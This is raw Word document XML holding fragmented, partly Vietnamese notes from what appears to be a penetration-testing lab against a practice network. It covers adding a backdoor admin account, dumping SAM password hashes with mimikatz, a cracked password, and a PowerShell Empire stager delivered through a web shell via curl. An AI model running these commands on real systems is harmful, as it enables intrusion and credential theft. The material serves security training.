          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">net user dai </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000369B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1:Giterver</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000369B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF05C21" w14:textId="2F69B052" w:rsidR="008C367F" w:rsidRDefault="008C367F" w:rsidP="000369B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Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> we add our newly created account in the "Administrators" and "Remote Management Users" groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E74310B" w14:textId="71DE800B" w:rsidR="008C367F" w:rsidRDefault="008C367F" w:rsidP="008C367F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/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</w:pPr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net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 Administrators </w:t>
      </w:r>
      <w:r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dai</w:t>
      </w:r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 /add</w:t>
      </w:r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br/>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 "Remote Management Users" </w:t>
      </w:r>
      <w:r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dai</w:t>
      </w:r>
      <w:r w:rsidRPr="008C367F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 /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793E29C1" w14:textId="4C24A821" w:rsidR="00BC5855" w:rsidRDefault="00BC5855" w:rsidP="00BC58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rdp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remmina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3552E057" w14:textId="176A4585" w:rsidR="004B68EF" w:rsidRDefault="004B68EF" w:rsidP="00BC5855">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F9BBA2" w14:textId="21A01829" w:rsidR="00CC1399" w:rsidRDefault="00CC1399" w:rsidP="00BC5855">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE30D65" w14:textId="2AB8DB29" w:rsidR="00BC5855" w:rsidRDefault="003D4910" w:rsidP="008C367F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:proofErr w:type="spellStart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xfreerdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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u:dai</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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1 /p:'nodai1' /v:10.200.84.150 +clipboard /dynamic-resolution /drive:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/share/windows-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4910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resources,share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C63482E" w14:textId="767CFE1C" w:rsidR="00BC5855" w:rsidRDefault="00BC5855" w:rsidP="008C367F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="7154F616" w14:textId="3BC1E022" w:rsidR="00BC5855" w:rsidRDefault="008B5407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bật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cmd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trên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rdp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rồi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chạy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mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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="008661A5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nếu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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</w:p>
    <w:p w14:paraId="213F5D09" w14:textId="62DF3628" w:rsidR="008B5407" w:rsidRDefault="000235DA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hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="008661A5" w:rsidRPr="007F00D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>\\tsclient\share\mimikatz\x64\mimikatz.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0968E759" w14:textId="19CEA443" w:rsidR="008661A5" w:rsidRDefault="008661A5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Lưu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ý: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Nếu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bạn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đã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sử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dụng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một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r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>share name</w:t>
      </w:r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khác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,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bạn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sẽ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cần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thay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thế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điều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này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.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Cũng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như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vậy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,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nếu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lỗi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lệnh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,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bạn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có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thể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cần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cài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đặt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mimikatz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trên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r w:rsidR="00E8492C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="008661A5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27805BEF" w14:textId="2F1643E4" w:rsidR="002E645C" w:rsidRDefault="002E645C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Vd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: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Dùng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evil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để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upload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mimikat</w:t>
      </w:r>
      <w:r w:rsidR="00AD3317">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="043749FD" w14:textId="508C1EF9" w:rsidR="00AD3317" w:rsidRDefault="00AD3317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AD3317">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A8D2787" wp14:editId="04321D32">
            <wp:extent cx="5458587" cy="809738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D7A6" w14:textId="77777777" w:rsidR="002E645C" w:rsidRDefault="002E645C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</w:p>
    <w:p w14:paraId="0B8651F3" w14:textId="7F4B89E3" w:rsidR="00927BA2" w:rsidRDefault="00927BA2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tiếp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theo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,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chúng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ta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cần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tự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cấp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cho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mình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quyền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debug</w:t>
      </w:r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và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nâng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tính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toàn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vẹn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của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mình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>lên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00927BA2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r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D4F82" w14:textId="562B055A" w:rsidR="00A00807" w:rsidRPr="008661A5" w:rsidRDefault="008661A5" w:rsidP="00A00807">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>privilege::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>debug</w:t>
      </w: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  <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
        </w:rPr>
        <w:t>token::elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECF186C" w14:textId="34ED77C5" w:rsidR="00A00807" w:rsidRPr="00A00807" w:rsidRDefault="00A00807" w:rsidP="008661A5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Bây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giờ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chúng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ta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có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thể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r w:rsidR="00D51607">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r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tất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cả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r w:rsidR="00D51607" w:rsidRPr="00D516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SAM local password hashes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bằng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cách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sử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dụng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A00807">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A59AFA" w14:textId="444CEDD8" w:rsidR="008661A5" w:rsidRDefault="008661A5" w:rsidP="00A00807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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008661A5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lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008661A5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::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008661A5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sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="737FDBCD" w14:textId="0B203C84" w:rsidR="00580574" w:rsidRPr="008C367F" w:rsidRDefault="00580574" w:rsidP="008C367F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80574">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75DFE2AE" wp14:editId="0B3D0744">
            <wp:extent cx="5943600" cy="2785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21CC" w14:textId="2DBE4968" w:rsidR="00E70656" w:rsidRDefault="00E70656" w:rsidP="000369B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B7E047" w14:textId="77777777" w:rsidR="001241B5" w:rsidRDefault="001241B5" w:rsidP="00036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dump ta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hash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Thomas </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA10BA2" w14:textId="576FECAA" w:rsidR="001241B5" w:rsidRDefault="001241B5" w:rsidP="000369B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crack station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crack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Thomas :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7812DA64" w14:textId="5B887FF0" w:rsidR="00E70656" w:rsidRDefault="001241B5" w:rsidP="000369B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241B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241B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;3ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AC3AFB" w14:textId="0E5F93BE" w:rsidR="00E70656" w:rsidRDefault="00E70656" w:rsidP="000369B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B38A83" w14:textId="7B1A0529" w:rsidR="00E70656" w:rsidRDefault="00E70656" w:rsidP="00036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516568">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ù</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii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evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>winrm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</w:t>
      </w:r>
      <w:r w:rsidR="00D41D49">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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626EFA68" w14:textId="5142BB38" w:rsidR="008C367F" w:rsidRDefault="0097099B" w:rsidP="000369B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00970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4D685" wp14:editId="133DF2B3">
            <wp:extent cx="5943600" cy="33477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928B" w14:textId="1633A814" w:rsidR="00A368BB" w:rsidRDefault="00A368BB" w:rsidP="000369B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C3C8FA" w14:textId="30020420" w:rsidR="00A368BB" w:rsidRDefault="00A36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650947" w14:textId="261EF73A" w:rsidR="00A368BB" w:rsidRDefault="00A368BB" w:rsidP="00A368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POWERHSELL EMPIRE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020627EB" w14:textId="75D6EF81" w:rsidR="00B05477" w:rsidRDefault="00B05477" w:rsidP="00B0547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Khởi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empire server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775B9458" w14:textId="5D570D29" w:rsidR="00B05477" w:rsidRDefault="00B05477" w:rsidP="00B0547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lệnh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51AF109D" w14:textId="58A1620C" w:rsidR="00B05477" w:rsidRDefault="00B05477" w:rsidP="00B054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47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054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477">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lsof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B05477">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -n -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B0547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05477">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> :5000 | grep LISTEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B5375" w14:textId="3F77D8D1" w:rsidR="00045446" w:rsidRDefault="00D4246A" w:rsidP="00B05477">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D424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E83E4" wp14:editId="4C71A947">
            <wp:extent cx="5943600" cy="2939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0D5D" w14:textId="694C3E34" w:rsidR="00D4246A" w:rsidRDefault="00D4246A" w:rsidP="00D4246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Khởi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empire client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C5A376" w14:textId="77777777" w:rsidR="00D4246A" w:rsidRDefault="00D4246A" w:rsidP="00B05477">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B00EB31" w14:textId="613D45F4" w:rsidR="009E4C8E" w:rsidRDefault="009E4C8E" w:rsidP="009E4C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listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AC1609" w14:textId="403831E8" w:rsidR="00A368BB" w:rsidRDefault="00670635" w:rsidP="00A368BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00670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F5DB5" wp14:editId="3B9EF443">
            <wp:extent cx="5943600" cy="17837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572A" w14:textId="2F7A25F4" w:rsidR="009E4C8E" w:rsidRDefault="009E4C8E" w:rsidP="00A368BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB50CCC" w14:textId="77777777" w:rsidR="00670635" w:rsidRDefault="006706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0ED0B0" w14:textId="5C0D925E" w:rsidR="00B2650F" w:rsidRDefault="00B2650F" w:rsidP="00A36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 stager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB3A38A" w14:textId="070B188B" w:rsidR="00B2650F" w:rsidRDefault="00670635" w:rsidP="00A368BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00670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B93F39" wp14:editId="50A64E71">
            <wp:extent cx="5943600" cy="4522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049" w14:textId="25A46F18" w:rsidR="00B2650F" w:rsidRDefault="00B2650F" w:rsidP="00A36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Paste payload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 target</w:t>
      </w:r>
      <w:r w:rsidR="005C5DB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .200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empire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agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A0121D" w14:textId="2CE3B28F" w:rsidR="00B2650F" w:rsidRDefault="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2569FB31" w14:textId="21EDB6E0" w:rsidR="00B2650F" w:rsidRDefault="00B2650F" w:rsidP="00A36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lisenter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3C37DA1E" w14:textId="0D3CCC05" w:rsidR="00B2650F" w:rsidRDefault="00253230" w:rsidP="00A368BB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002532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6B81BA" wp14:editId="04399C09">
            <wp:extent cx="5943600" cy="5062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A7EF" w14:textId="334E7F8A" w:rsidR="00B2650F" w:rsidRDefault="00CB0A1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Nén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0A1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B0A10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CB0A1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B0A10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CB0A10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB0A1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file zip, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rồi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python.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dung curl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target .200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nén</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C273E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C591B75" w14:textId="77777777" w:rsidR="000D1B3A" w:rsidRDefault="00C273E9" w:rsidP="00DD2134">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mở</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> port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server php</w:t>
      </w:r>
      <w:r w:rsidR="00DD2134">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D5862C" w14:textId="31CDB9AE" w:rsidR="00C273E9" w:rsidRPr="00DD2134" w:rsidRDefault="00DD2134" w:rsidP="00DD2134">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="212529"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2134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php -S </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD2134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0.0.0.0:PORT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD2134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 xml:space="preserve"> &amp;&gt;/dev/null &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5BEF0" w14:textId="2CB2EF51" w:rsidR="00C273E9" w:rsidRDefault="00C273E9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C273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93C446" wp14:editId="0EC6172D">
            <wp:extent cx="5943600" cy="14979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9FD2" w14:textId="402B8320" w:rsidR="00B2650F" w:rsidRDefault="00007AA1" w:rsidP="00A36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 w:rsidR="00B2650F" w:rsidRPr="00B2650F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>usestager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B2650F" w:rsidRPr="00B2650F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> multi/launcher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113AD7A3" w14:textId="2B2B6B0F" w:rsidR="00B2650F" w:rsidRDefault="00B2650F" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B265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9F501" wp14:editId="7668E4C8">
            <wp:extent cx="5943600" cy="2899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E3AF" w14:textId="441D06F7" w:rsidR="00D34DA3" w:rsidRDefault="000F21AC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="00547E70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245C3949" w14:textId="045BED05" w:rsidR="00CB0A10" w:rsidRDefault="00547E70" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00547E70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl -X POST http://10.200.84.150/web/exploit-dai.php -d "a=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00547E70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E77E0A3" w14:textId="3967F97B" w:rsidR="00CB0A10" w:rsidRDefault="00F00FFB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payload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</w:p>
    <w:p w14:paraId="20437EC7" w14:textId="77777777" w:rsidR="00F00FFB" w:rsidRPr="00F00FFB" w:rsidRDefault="00F00FFB" w:rsidP="00F00FFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
